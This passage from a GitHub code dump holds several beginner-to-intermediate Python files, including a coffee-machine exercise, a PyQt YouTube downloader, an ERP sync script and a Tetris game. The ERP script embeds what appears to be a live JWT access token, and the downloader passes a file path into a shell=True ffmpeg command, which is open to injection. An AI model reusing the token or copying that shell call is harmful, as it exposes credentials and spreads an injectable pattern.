)\n","repo_name":"rwth-i6/i6_experiments","sub_path":"users/berger/configs/sms_wsj/20220615_dfg_multi_speaker/wsj_16kHz.bak/config_03b_blstm_transducer_fullsum.py","file_name":"config_03b_blstm_transducer_fullsum.py","file_ext":"py","file_size_in_byte":12193,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"86"} +{"seq_id":"18055734272","text":"MENU = {\r\n \"espresso\": {\r\n \"ingredients\": {\r\n \"water\": 50,\r\n \"milk\": 0,\r\n \"coffee\": 18,\r\n },\r\n \"cost\": 1.5,\r\n },\r\n \"latte\": {\r\n \"ingredients\": {\r\n \"water\": 200,\r\n \"milk\": 150,\r\n \"coffee\": 24,\r\n },\r\n \"cost\": 2.5,\r\n },\r\n \"cappuccino\": {\r\n \"ingredients\": {\r\n \"water\": 250,\r\n \"milk\": 100,\r\n \"coffee\": 24,\r\n },\r\n \"cost\": 3.0,\r\n }\r\n}\r\n\r\nresources = {\r\n \"water\": 300,\r\n \"milk\": 200,\r\n \"coffee\": 100,\r\n \"profit\": 0,\r\n}\r\n\r\n\r\ndef total_sum(quarters, dimes, nickles, pennies):\r\n total_amount = quarters*0.25 + dimes*0.1 + nickles*0.05 + pennies*0.01\r\n return total_amount\r\n\r\n\r\ndef report():\r\n print(f\"Water: {resources['water']}ml\")\r\n print(f\"Milk: {resources['milk']}ml\")\r\n print(f\"Coffee: {resources['coffee']}g\")\r\n print(f\"Money: ${resources['profit']}\")\r\n\r\n\r\ndef is_sufficient(coffee_select):\r\n if resources[\"water\"] < MENU[coffee_select][\"ingredients\"][\"water\"]:\r\n print(\"Sorry there is not enough water\")\r\n return False\r\n elif resources[\"milk\"] < MENU[coffee_select][\"ingredients\"][\"milk\"]:\r\n print(\"Sorry there is not enough milk\")\r\n return False\r\n elif resources[\"coffee\"] < MENU[coffee_select][\"ingredients\"][\"coffee\"]:\r\n print(\"Sorry there is not enough coffee\")\r\n return False\r\n else:\r\n return True\r\n\r\n\r\ndef check_transaction(total_amount):\r\n if total_amount > MENU[coffee_select][\"cost\"]:\r\n resources[\"profit\"] += MENU[coffee_select][\"cost\"]\r\n change_money = total_amount - MENU[coffee_select][\"cost\"]\r\n # change_money = round(change_money, 2)\r\n print(\"Here is ${:0.2f} dollars in change.\".format(change_money))\r\n return True\r\n else:\r\n print(\"Sorry that's not enough money. Money refunded.\")\r\n return False\r\n\r\n\r\ndef make_coffee(coffee_select):\r\n resources[\"water\"] -= MENU[coffee_select][\"ingredients\"][\"water\"]\r\n resources[\"milk\"] -= MENU[coffee_select][\"ingredients\"][\"milk\"]\r\n resources[\"coffee\"] -= MENU[coffee_select][\"ingredients\"][\"coffee\"]\r\n\r\n\r\nflag = True\r\n\r\nwhile flag:\r\n coffee_select = input(\"What would you like? (espresso/latte/cappuccino): \")\r\n\r\n if coffee_select == \"report\":\r\n report()\r\n elif coffee_select == \"off\":\r\n flag = False\r\n else:\r\n #After selection of the coffee we need to check if there is sufficient resource available for that coffee\r\n is_resource_sufficient = is_sufficient(coffee_select)\r\n\r\n if is_resource_sufficient:\r\n # Resolving amount to be paid for the selected coffee\r\n print(\"Please insert coins.\")\r\n quarters = int(input(\"how many quarters?: \"))\r\n dimes = int(input(\"how many dimes?: \"))\r\n nickles = int(input(\"how many nickles?: \"))\r\n pennies = int(input(\"how many pennies?: \"))\r\n\r\n total_amount = total_sum(quarters, dimes, nickles, pennies)\r\n\r\n is_transaction_successful = check_transaction(total_amount)\r\n if is_transaction_successful:\r\n make_coffee(coffee_select)\r\n print(f\"Here is your {coffee_select}. Enjoy!\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"abhishekguptanits/Python100DaysOfCode","sub_path":"day-0/CoffeeMachine/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"72750834845","text":"from utils import *\nfrom youtube_dl.postprocessor.common import PostProcessor\nfrom youtube_dl.utils import encodeArgument, PostProcessingError\nimport subprocess\nimport os\nfrom shutil import move\n\n\nclass AudioPP(PostProcessor):\n def run(self, information):\n directory, filename = os.path.split(information['filepath'])\n if directory == '':\n directory = os.getcwd()\n outfile = os.path.join(directory, filename)\n print(outfile)\n tempfile = os.path.join(os.getcwd(), 'temp.mp3')\n command = f'ffmpeg -i \"{outfile}\" -acodec copy {tempfile} -y'\n retCode = subprocess.call(encodeArgument(command), shell=True)\n if retCode != 0:\n raise PostProcessingError(\n 'Command returned error code %d' % retCode)\n move(tempfile, outfile)\n return [], information\n\n\nclass MyLogger(object):\n def __init__(self, download_manager):\n self.download_manager = download_manager\n\n def debug(self, msg):\n if '[ffmpeg]' in msg:\n if 'Destination' in msg:\n idx = msg.find('Destination')\n msg = msg[:idx] + '\\n' + msg[idx:]\n if 'Merging formats into' in msg:\n msg = msg[:30] + '\\n' + msg[30:]\n self.download_manager.sig_msg.emit(msg)\n elif 'Deleting' in msg:\n self.download_manager.sig_msg.emit('Deleting Originals')\n else:\n pass\n\n def warning(self, msg):\n pass\n\n def error(self, msg):\n if msg == 'ERROR: requested format not available':\n pass\n elif 'ERROR: unable to download video data' in msg:\n pass\n else:\n self.download_manager.sig_error.emit(msg)\n\n\nclass DownloadManager(QObject):\n \"\"\"\n The Download Manager will be initiated as a new QThread worker consisting of the YouTube-dl objects.\n The signals emitted will be relayed back to the main GUI.\n \"\"\"\n sig_msg = pyqtSignal(str)\n sig_item = pyqtSignal(QStandardItem)\n sig_tProgress = pyqtSignal(int)\n sig_dProgress = pyqtSignal(int)\n sig_error = pyqtSignal(str)\n sig_done = pyqtSignal(int)\n\n def __init__(self, download_tab):\n super().__init__()\n self.__abort = False\n self.download_tab = download_tab\n self.main_window = self.download_tab.main_window\n\n self.logger = MyLogger(self)\n\n # Settings to format the downloader options\n self.proxy = self.main_window.settings.value('proxy') if int(self.main_window.settings.value('proxyChecked')) == 2 else None\n self.outtmpl = os.path.join(self.main_window.settings.value('directory'), self.main_window.settings.value('output'))\n self.nooverwrites = False if int(self.main_window.settings.value('overwrite')) == 2 else True\n self.writesubtitles = True if int(self.main_window.settings.value('writesubtitles')) == 2 else False\n self.writeautomaticsub = True if int(self.main_window.settings.value('writeautomaticsub')) == 2 else False\n self.subtitleslangs = self.main_window.settings.value('subtitleslangs')\n if type(self.subtitleslangs) == str:\n self.subtitleslangs = self.subtitleslangs.split(', ')\n if 'zh' in self.subtitleslangs:\n self.subtitleslangs.append('zh-Hans')\n self.subtitleslangs.append('zh-Hant')\n self.keepvideo = True if int(self.main_window.settings.value('keepFiles')) == 2 else False\n self.video_postprocessor = [{'key': 'FFmpegVideoConvertor', 'preferedformat': self.main_window.settings.value('preferredVideos')}] if int(self.main_window.settings.value('convertFormats')) == 2 else None\n self.audio_postprocessor = [{'key': 'FFmpegExtractAudio', 'preferredcodec': self.main_window.settings.value('preferredAudios')}] if int(self.main_window.settings.value('convertFormats')) == 2 else None\n\n self.default_opts = \"\"\"{\n 'proxy': self.proxy,\n 'outtmpl': self.outtmpl,\n 'format': 'best',\n 'postprocessors': self.video_postprocessor,\n 'keepvideo': self.keepvideo,\n 'writesubtitles': self.writesubtitles,\n 'writeautomaticsub': self.writeautomaticsub,\n 'subtitleslangs': self.subtitleslangs,\n 'logger': self.logger,\n 'progress_hooks': [self.progress_hook],\n 'nooverwrites': self.nooverwrites,\n }\"\"\"\n self.default_downloader = YDL(eval(self.default_opts))\n\n video_opts = eval(self.default_opts)\n video_opts['format'] = 'bestvideo+bestaudio'\n video_opts['postprocessors'] = [{'key': 'FFmpegMerger'}]\n video_opts['merge_output_format'] = self.main_window.settings.value('preferredVideos')\n self.ydl_video = YDL(video_opts)\n\n audio_opts = eval(self.default_opts)\n audio_opts['format'] = 'bestaudio/best'\n audio_opts['postprocessors'] = self.audio_postprocessor\n self.ydl_audio = YDL(audio_opts)\n\n self.ydl = []\n selection = self.main_window.Stream.currentText()\n\n if selection == 'Best Quality (Merge)':\n self.ydl.append(self.ydl_video)\n\n if selection == 'Best Quality (Separate)':\n self.ydl.append(self.ydl_video)\n self.ydl.append(self.ydl_audio)\n\n if selection[-1] == 'p':\n ydl_opts = eval(self.default_opts)\n ydl_opts['format'] = 'best[height<={}]'.format(selection[-4:-1])\n downloader = YDL(ydl_opts)\n self.ydl.append(downloader)\n\n if selection == 'Audio Only':\n self.ydl_audio.add_post_processor(AudioPP(None))\n self.ydl.append(self.ydl_audio)\n\n def download(self, downloader, link):\n incomplete = True\n while incomplete:\n try:\n downloader.download([link])\n incomplete = False\n except Exception as e:\n if 'ERROR: unable to download video data' in str(e):\n pass\n else:\n raise e\n\n def start_downloader(self):\n for (i, idx) in enumerate(self.main_window.downloadVideos.selectedIndexes()):\n self.sig_tProgress.emit(i)\n item = idx.model().itemFromIndex(idx)\n self.sig_item.emit(item)\n\n outtmpl = self.outtmpl\n if '%(format_id)s' not in outtmpl:\n idx = outtmpl.find('.%(ext)s')\n outtmpl = outtmpl[:idx] + ' - %(format_id)s.%(ext)s'\n\n if len(item.video_streams) > 0:\n format = ''\n for stream in item.video_streams:\n format += stream + ','\n format = format[:-1]\n\n video_opts = eval(self.default_opts)\n video_opts['format'] = format\n video_opts['outtmpl'] = outtmpl\n video_ydl = YDL(video_opts)\n self.download(video_ydl, item.text())\n\n if len(item.audio_streams) > 0:\n format = ''\n for stream in item.audio_streams:\n format += stream + ','\n format = format[:-1]\n\n audio_opts = eval(self.default_opts)\n audio_opts['format'] = format\n audio_opts['outtmpl'] = outtmpl\n audio_opts['postprocessors'] = self.audio_postprocessor\n audio_ydl = YDL(audio_opts)\n self.download(audio_ydl, item.text())\n\n if len(item.video_streams) > 0 or len(item.audio_streams) > 0:\n break\n\n try:\n for downloader in self.ydl:\n self.download(downloader, item.text())\n except Exception as e:\n if str(e) == 'ERROR: requested format not available':\n self.download(self.default_downloader, item.text())\n\n self.sig_dProgress.emit(0)\n self.sig_tProgress.emit(len(self.main_window.downloadVideos.selectedIndexes()))\n self.sig_done.emit(0)\n\n def progress_hook(self, d):\n if d['status'] == 'finished':\n file_tuple = os.path.split(os.path.abspath(d['filename']))\n self.sig_msg.emit('Finished downloading {}'.format(file_tuple[1]))\n if d['status'] == 'downloading':\n p = d['_percent_str']\n p = p.replace('%', '')\n self.sig_dProgress.emit(float(p))\n self.sig_msg.emit('Downloading {} \\n Speed: {}, ETA: {}'.format(d['filename'], d['_speed_str'], d['_eta_str']))\n\n def abort(self):\n if self.__abort:\n return\n self.sig_msg.emit('Aborting Downloads')\n self.__abort = True\n\n\nclass DownloadTab(QWidget):\n display_name = 'Download'\n threads = []\n\n def __init__(self, main_window):\n super().__init__(main_window)\n QThread.currentThread().setObjectName('download_tab')\n self.main_window = main_window\n self.main_window.download_tab = self\n self.init_ui()\n # self.webEngineView.page().setBackgroundColor(Qt.transparent)\n self.show()\n\n def init_ui(self):\n if hasattr(sys, \"_MEIPASS\"):\n datadir = os.path.join(sys._MEIPASS, 'tabs/download.ui')\n else:\n datadir = 'tabs/download.ui'\n loadUi(datadir, self)\n self.webEngineView.setPage(WebEnginePage(self.webEngineView))\n self.webEngineView.settings().setAttribute(QWebEngineSettings.FullScreenSupportEnabled, True)\n self.page = self.webEngineView.page()\n self.page.fullScreenRequested.connect(self.toggleFullScreen)\n self.webEngineView.exitFullScreen = QShortcut(QKeySequence(Qt.Key_Escape), self.webEngineView)\n self.webEngineView.exitFullScreen.activated.connect(self.exitFullScreen)\n self.Streams.sortByColumn(1, Qt.DescendingOrder)\n self.Streams.itemChanged.connect(self.tickbox)\n\n def toggleFullScreen(self, request):\n if request.toggleOn():\n request.accept()\n self.webViewLayout.removeWidget(self.webEngineView)\n self.webEngineView.setParent(None)\n self.webEngineView.showFullScreen()\n else:\n request.accept()\n self.webEngineView.setGeometry(QRect(int((self.geometry().width()-800)/2), 0, 784, 434))\n self.webViewLayout.addWidget(self.webEngineView)\n QApplication.setActiveWindow(self.main_window)\n self.webEngineView.setFocus()\n widget = QApplication.focusObject()\n print(widget)\n\n def exitFullScreen(self):\n self.webEngineView.triggerPageAction(self.page.ExitFullScreen)\n\n def start_worker(self):\n worker = DownloadManager(self)\n worker.sig_msg.connect(self.textDisplay.setText)\n worker.sig_item.connect(self.showStreams)\n worker.sig_item.connect(self.showThumbnail)\n worker.sig_tProgress.connect(self.update_total)\n worker.sig_dProgress.connect(self.downloadProgress.setValue)\n worker.sig_error.connect(self.main_window.show_error)\n worker.sig_done.connect(self.on_worker_done)\n\n thread = QThread()\n self.threads.append((thread, worker))\n worker.moveToThread(thread)\n\n self.main_window.downloadBtn.setEnabled(False)\n self.main_window.downloadAllBtn.setEnabled(False)\n\n thread.started.connect(worker.start_downloader)\n thread.start()\n\n def download(self):\n self.main_window.tab_manager.setCurrentIndex(1)\n self.totalProgress.setMaximum(len(self.main_window.downloadVideos.selectedIndexes()))\n QApplication.instance().processEvents()\n self.start_worker()\n\n def downloadAll(self):\n self.main_window.downloadVideos.selectAll()\n self.download()\n\n def update_total(self, i):\n self.totalProgress.setFormat('{}/{}'.format(i, self.totalProgress.maximum()))\n\n def abort_workers(self):\n for thread, worker in self.threads:\n worker.abort()\n thread.quit()\n thread.wait()\n\n @pyqtSlot()\n def on_worker_done(self):\n self.textDisplay.setText('All downloads complete.')\n\n self.main_window.downloadBtn.setEnabled(True)\n self.main_window.downloadAllBtn.setEnabled(True)\n\n def showVideo(self, idx):\n item = idx.model().itemFromIndex(idx)\n info = item.info\n if info is None:\n return\n videoId = info.get('id')\n netloc = urlparse(info.get('webpage_url')).netloc\n myhtml = \"\"\"\"\"\".format(netloc, videoId)\n\n self.webEngineView.setHtml(myhtml, QUrl(\"local\"))\n self.main_window.tab_manager.setCurrentIndex(1)\n self.webEngineView.setFocus()\n\n if self.sender() == self.main_window.downloadVideos:\n self.showStreams(item)\n\n def showStreams(self, item):\n if self.Streams.topLevelItemCount() == 2:\n if self.video_streams.itemparent is item:\n return\n else:\n self.Streams.clear()\n\n self.video_streams = rootWidgetItem(self.Streams, ['Video'])\n self.audio_streams = rootWidgetItem(self.Streams, ['Audio'])\n self.video_streams.itemparent = item\n self.audio_streams.itemparent = item\n\n info = item.info\n if info.get('formats') is None:\n info = self.main_window.API.ydl.extract_info(info['webpage_url'], download=False)\n videos, audios = self.main_window.API.ydl.list_formats(info)\n for entry in videos:\n t = TreeWidgetItem(entry)\n if entry[0] in item.video_streams:\n t.setCheckState(0, 2)\n else:\n t.setCheckState(0, 0)\n self.video_streams.addChild(t)\n for entry in audios:\n t = TreeWidgetItem(entry)\n if entry[0] in item.audio_streams:\n t.setCheckState(0, 2)\n else:\n t.setCheckState(0, 0)\n t.setCheckState(0, 0)\n self.audio_streams.addChild(t)\n self.Streams.expandAll()\n\n def tickbox(self, item):\n if item.checkState(0) == 2:\n if item.text(1) == 'audio only':\n item.parent().itemparent.audio_streams.add(item.text(0))\n else:\n item.parent().itemparent.video_streams.add(item.text(0))\n else:\n if item.text(1) == 'audio only':\n item.parent().itemparent.audio_streams.remove(item.text(0))\n else:\n item.parent().itemparent.video_streams.remove(item.text(0))\n\n def showThumbnail(self, item):\n thumbnail = item.info['thumbnail_entry']\n header = \"\"\"\n \n \n \n \n \n \n \n \n \n\n \n \"\"\"\n\n footer = \"\"\"\n \n \n \"\"\"\n\n myhtml = header + thumbnail + footer\n self.webEngineView.setHtml(myhtml)\n","repo_name":"BII-wushuang/YouTube_Helper","sub_path":"tabs/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":15531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"38813737864","text":"#! python3\n\n# Write a program that opens all .txt files in a folder and searches for any\n# line that matches a user-supplied regular expression. The results should\n# be printed to the screen.\nimport re, os\n## Building Folder Structure\n# Get the directory path of the current script\nscript_directory = os.path.dirname(os.path.abspath(__file__))\n# Create the file path\ndir_path = os.path.join(script_directory, 'regex_search_folder')\n\n# List files in the directory\nfiles = os.listdir(dir_path)\n\nwhile True:\n pattern_input = input(\"***\\nEnter a regular expression pattern: \")\n pattern_occurred = False\n\n for file in files:\n file_path = os.path.join(dir_path, file)\n # print(file_path)\n\n # Open File and split each line\n file_open = open(file_path, 'r')\n file_line_list = file_open.read().split(\"\\n\")\n\n # Loop thru file_line_list and store index using enumerate\n for index, line in enumerate(file_line_list, start=1):\n # using regex, search each line using pattern input and print it out\n if re.search(pattern_input, line):\n print(f\"Search Pattern '{pattern_input}' Found in...\\nFile: '{file}' on Line: '{index}' = '{line}'\\n\")\n pattern_occurred = True \n # matches = re.findall(pattern_input, line)\n # print(matches)\n\n if not pattern_occurred:\n print(f\"\\nNo Search Pattern '{pattern_input}' Found\\n\")\n\n","repo_name":"BlakeXYZ/AtBS-Python-Projects","sub_path":"ch9__Reading and Writing Files/regexSearch.py","file_name":"regexSearch.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"25899723051","text":"#!/bin/python3\nimport sys\nimport argparse\nimport requests\nimport yaml\n\n# HOST = \"http://localhost:8080\"\nHOST = \"https://linebot-nsun2l34rq-de.a.run.app\"\n\ndef loadQuestion(args):\n config = args.config[0]\n with open(config, 'r') as input:\n questionSet = [\n q for q in yaml.safe_load_all(input) if q is not None\n ]\n for questions in questionSet:\n postQuestionSet(questions)\n\ndef postQuestionSet(questions):\n questions = questions[::-1]\n next = None\n for question in questions:\n next = postQuestion(question, next)\n\ndef postQuestion(question, next):\n chat = postAction(question.get('chat', []))\n ok = [{\"id\": postAction(act)} for act in question.get('ok', [])]\n error = [{\"id\": postAction(act)} for act in question.get('error', [])]\n response = requests.post(f\"{HOST}/api/questions\", json={\n \"chat\": {\"id\": chat},\n \"answer\": question[\"answer\"],\n \"ok\": ok,\n \"error\": error,\n \"next\" : [{\"id\": next} ] if next is not None else [],\n })\n if response.status_code != 200:\n raise RuntimeError(response.text)\n q = response.json()\n print(q)\n return q[\"id\"]\n\ndef loadChat(args):\n config = args.config[0]\n with open(config, 'r') as input:\n actions = [\n action for action in yaml.safe_load_all(input)\n if action is not None\n ]\n for action in actions:\n postAction(action)\n\ndef postAction(action) -> int:\n chats = action[::-1]\n nxt: int = None\n for chat in chats:\n nxt = postChat(chat, nxt)\n return nxt\n\ndef postChat(chat, nxt: int = None) -> int:\n msgType = None\n if \"text\" in chat:\n msgType = \"text\"\n elif \"sticker\" in chat:\n msgType = \"sticker\"\n elif \"image\" in chat:\n msgType = \"image\"\n if nxt:\n chat[\"nextChats\"] = [{\"id\": nxt}]\n response =requests.post(f\"{HOST}/api/chats/{msgType}\", json=chat)\n if response.status_code != 200:\n raise RuntimeError(response.text)\n result = response.json()\n print(result)\n return result[\"id\"]\n\ndef debug(args):\n print(\"debug\")\n\ndef main():\n parser = argparse.ArgumentParser(description=\"linebot util\")\n subparsers = parser.add_subparsers()\n\n debug_cmd = subparsers.add_parser(\"debug\")\n debug_cmd.set_defaults(func=debug)\n\n load_chat_cmd = subparsers.add_parser(\"loadChat\")\n load_chat_cmd.set_defaults(func=loadChat)\n load_chat_cmd.add_argument(\"config\", nargs=1, type=str)\n\n load_question_cmd = subparsers.add_parser(\"loadQuestion\")\n load_question_cmd.set_defaults(func=loadQuestion)\n load_question_cmd.add_argument(\"config\", nargs=1, type=str)\n\n args = parser.parse_args(sys.argv[1:])\n args.func(args)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"blueworrybear/linebot","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"27545306455","text":"# Creating PDF Files with Python\n\n# Why PDF?\n# PDF file format is global. It is one of the most common file formats in use today and extensively used in all areas.\n# It is portable. Yes! PDF stands for Portable Document Format. You can move your files around without having to worry about any restrictions.\n# It is a platform-independent tool. It is independent of the hardware and the operating system. You can create your pdf files in Windows and view them in a Macintosh or Unix.\n# It can be used offline. You don’t even need an internet connection.\n# The ease of generation. There are many different ways to create a PDF file. Our purpose is to learn how to do it with Python.\n\n# Import fpdf class\nfrom fpdf import FPDF\n\nclass PDF(FPDF):\n # Create a line method to draw a line in the middle of the page\n def line(self):\n # Set line width to 0.0 mm\n self.set_line_width(0.0) \n\n # Draw a simple line with four arguments: line(x1, y1, x2, y2)\n self.line(0, pdf_height/2, 210, pdf_height/2)\n\n# Create an object of the PDF class with Defualt A4 Format\npdf = PDF() \n\n# Set page orientation\n# Set unit measurement\n# Set page format\npdf = PDF(orientation='P', unit='mm', format='A4')\n\n # Add Page and save the output\npdf.add_page() # add.page function adds a new page to the document.\npdf.output('python-notes.pdf', 'F')\n\n# PyFPDF is built on the coordinate space (x,y)\n# The default value of orientation is ‘A4’\n# The size of A4 is: w:210 mm and h:297 mm\n\n# Assign size of A4 dimensions to variables for later use\npdf_width = 210\npdf_height = 297\n\n\n","repo_name":"Jokmonsimon/python-20-days-challenge","sub_path":"afande-ojok/pc_20_days_set_2/0x02-day_2/pdf_generator.py","file_name":"pdf_generator.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"31515337572","text":"import logging\nimport requests\nimport json\nimport sys\nBASE_URL_ERP = \"http://xxxx:port/api/v1/\"\nBASE_URL_ELS = \"http://xxxx:port/eslhttpservice/pushgoods/\"\ndebug = 0\nif len(sys.argv)>1:\n debug = sys.argv[1]\n print(debug)\ndef get_commodity():\n reqdata = {}\n reqdata['x-access-token'] = \"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiSFowODgwOCJ9.hpuBiupMSHaEu9LKOOms8PknZ1cXqxi1uBVoMMMiAIQ\"\n reqdata['command'] = 'query_all_commodity'\n r = requests.post(BASE_URL_ERP + 'post_common/', json=reqdata)\n result = r.json()\n if r.status_code == 200:\n if debug == \"1\":\n print(\"get response == \", json.dumps(result, sort_keys=True, indent=4, ensure_ascii=False))\n return result\n else:\n logging.error('get_commodity fail! error msg is : %s' % json.dumps(result, sort_keys=True, ensure_ascii=False))\n if debug == \"1\":\n print(\"get_commodity fail! error msg is :\", result)\n return None\n\ndef organize_commodity(commodity_resp):\n array = commodity_resp['output']\n ol = [[]for i in range(len(array))]\n comm_id =0 \n for t in array:\n ol[comm_id].append({'PropertyName': 'GoodsCode', 'Value': t['barcode']})\n ol[comm_id].append({'PropertyName': '商品名称', 'Value': t['name']})\n ol[comm_id].append({'PropertyName': \"产地\", 'Value': \" \"})\n ol[comm_id].append({'PropertyName': \"规格\", 'Value': \" \"})\n ol[comm_id].append({'PropertyName': \"计价单位\", 'Value': \" \"})\n ol[comm_id].append({'PropertyName': \"等级\", 'Value': \" \"})\n ol[comm_id].append({'PropertyName': \"零售价\", 'Value': t['price']})\n ol[comm_id].append({'PropertyName': \"会员价\", 'Value': \" \"})\n ol[comm_id].append({'PropertyName': \"货号\", 'Value': \" \"})\n ol[comm_id].append({'PropertyName': '条码', 'Value': t['barcode']})\n ol[comm_id].append({'PropertyName': \"二维码\", 'Value': \" \"})\n ol[comm_id].append({'PropertyName': \"缺货标记\", 'Value': \" \"})\n ol[comm_id].append({'PropertyName': \"促销开始时间\", 'Value': \" \"})\n ol[comm_id].append({'PropertyName': \"促销结束时间\", 'Value': \" \"})\n ol[comm_id].append({'PropertyName': \"原价\", 'Value': \" \"})\n ol[comm_id].append({'PropertyName': \"现价\", 'Value': \" \"})\n ol[comm_id].append({'PropertyName': \"货架号\", 'Value': \" \"})\n ol[comm_id].append({'PropertyName': \"最低库存\", 'Value': \" \"})\n ol[comm_id].append({'PropertyName': \"最高库存\", 'Value': \" \"})\n ol[comm_id].append({'PropertyName': \"长宽高\", 'Value': \" \"})\n ol[comm_id].append({'PropertyName': \"当前库存\", 'Value': \" \"})\n ol[comm_id].append({'PropertyName': \"默认供应商代码\", 'Value': \" \"})\n ol[comm_id].append({'PropertyName': \"默认供应商名称\", 'Value': \" \"})\n ol[comm_id].append({'PropertyName': \"是否促销\", 'Value': \" \"})\n ol[comm_id].append({'PropertyName': \"活动时间\", 'Value': \" \"})\n comm_id+=1\n if debug == \"1\":\n print(\"organize_commodity == \", json.dumps(ol, sort_keys=True, indent=4, ensure_ascii=False))\n return ol\n\ndef sync_commodity():\n ret = get_commodity()\n if ret is None:\n logging.info('Get commodity failed !')\n print(\"-3\")\n return\n if int(ret['nums']) < 1: # 一条记录也没有取到\n print(\"-2\")\n logging.info('There is no commodity in erp system')\n return\n commodity_list = organize_commodity(ret)\n if debug == \"1\":\n print(\"send post == \", json.dumps(commodity_list, sort_keys=True, indent=4, ensure_ascii=False))\n for commodity in commodity_list: \n try:\n r = requests.post(BASE_URL_ELS, json=commodity)\n except Exception as e:\n print(\"-4\")\n print(e)\n serr = traceback.format_exc()\n continue\n if r.status_code != 200:\n print(\"-5\")\n if debug == \"1\":\n print(\"sync error msg: \", r.text)\n continue\n result = r.json()\n if result['result'] != \"succeeded\":\n # 本次同步失败, 不保存任何数据\n print(\"-6\")\n if debug == \"1\":\n print(\"sync error msg: \", r.text,commodity[0])\n continue\n if debug == \"1\":\n print(\"got response == \", json.dumps(result, sort_keys=True, indent=4, ensure_ascii=False))\n\n#import pdb\ndef main():\n# pdb.set_trace()\n sync_commodity()\nmain()\n","repo_name":"htbig/Json-Struct","sub_path":"full-syc-data.py","file_name":"full-syc-data.py","file_ext":"py","file_size_in_byte":4983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"74075533084","text":"from asyncio.queues import Queue\nimport logging\nimport random\nimport asyncio\nfrom common import Dimensions\nfrom copy import deepcopy\nfrom shape import SHAPES\nfrom collections import Counter\n\nlogger = logging.getLogger(\"Game\")\nlogger.setLevel(logging.DEBUG)\n\nGAME_SPEED = 10\nSPEED_STEP = 10 # points\n\n\nclass Game:\n def __init__(self, x=10, y=30) -> None:\n logger.info(\"Game\")\n self.dimensions = Dimensions(x, y)\n self.current_piece = None\n self.next_pieces = [deepcopy(random.choice(SHAPES)) for _ in range(3)]\n\n self._bottom = [(i, y) for i in range(x)] # bottom\n self._lateral = [(0, i) for i in range(y)] # left\n self._lateral.extend([(x - 1, i) for i in range(y)]) # right\n\n self.grid = self._bottom + self._lateral\n\n self.game = []\n self.score = 0\n self.speed = 1\n self.game_speed = 10\n self._lastkeypress = None\n\n self.running = True\n\n def info(self):\n return {\n \"dimensions\": self.dimensions,\n \"grid\": self.grid,\n \"game_speed\": self.game_speed,\n \"score\": self.score\n }\n\n def clear_rows(self):\n lines = 0\n\n for item, count in sorted(Counter(y for _, y in self.game).most_common()):\n if count == len(self._bottom) - 2:\n self.game = [\n (x, y + 1) if y < item else (x, y)\n for (x, y) in self.game\n if y != item\n ] # remove row and drop lines\n lines += 1\n logger.debug(\"Clear line %s\", item)\n\n self.score += lines ** 2\n\n self.game_speed = GAME_SPEED + self.score // SPEED_STEP\n\n most_common = Counter(y for _, y in self.game).most_common(1)\n if most_common != []:\n (_, count) = most_common[0]\n assert count != len(self._bottom) - 2, f\"please create an issue https://github.com/dgomes/ia-tetris/issues sharing:\\n {self.game}\"\n\n def keypress(self, key):\n \"\"\"Update locally last key pressed.\"\"\"\n self._lastkeypress = key\n\n async def loop(self):\n logger.info(\"Loop - score: %s - speed: %s\", self.score, self.game_speed)\n await asyncio.sleep(1.0 / self.game_speed)\n if self.current_piece is None:\n self.current_piece = self.next_pieces.pop(0)\n self.next_pieces.append(deepcopy(random.choice(SHAPES)))\n\n logger.debug(\"New piece: %s\", self.current_piece)\n self.current_piece.set_pos(\n (self.dimensions.x - self.current_piece.dimensions.x) / 2, 0\n )\n if not self.valid(self.current_piece):\n logger.info(\"GAME OVER\")\n self.running = False\n\n self.current_piece.y += 1\n\n if self.valid(self.current_piece):\n if self._lastkeypress == \"s\":\n while self.valid(self.current_piece):\n self.current_piece.y += 1\n self.current_piece.y -= 1\n elif self._lastkeypress == \"w\":\n self.current_piece.rotate()\n if not self.valid(self.current_piece):\n self.current_piece.rotate(-1)\n elif self._lastkeypress == \"a\":\n shift = -1\n elif self._lastkeypress == \"d\":\n shift = +1\n\n if self._lastkeypress in [\"a\", \"d\"]:\n self.current_piece.translate(shift, 0)\n if self.collide_lateral(self.current_piece):\n logger.debug(\"Hitting the wall\")\n self.current_piece.translate(-shift, 0)\n elif not self.valid(self.current_piece):\n self.current_piece.translate(-shift, 0)\n\n else:\n self.current_piece.y -= 1\n self.game.extend(self.current_piece.positions)\n\n self.clear_rows()\n\n self.current_piece = None\n\n self._lastkeypress = None\n\n logger.debug(\"Current piece: %s\", self.current_piece)\n return {\n \"game\": self.game,\n \"piece\": self.current_piece.positions if self.current_piece else None,\n \"next_pieces\": [n.positions for n in self.next_pieces],\n \"game_speed\": self.game_speed,\n \"score\": self.score,\n }\n\n def valid(self, piece):\n return not any(\n [piece_part in self.grid for piece_part in piece.positions]\n ) and not any([piece_part in self.game for piece_part in piece.positions])\n\n def collide_lateral(self, piece):\n return any([piece_part in self._lateral for piece_part in piece.positions])\n","repo_name":"dgomes/ia-tetris","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":4635,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"86"} +{"seq_id":"74726717405","text":"import logging\nimport sys\n\n\ndef setup_logging(config):\n\tlog_level = 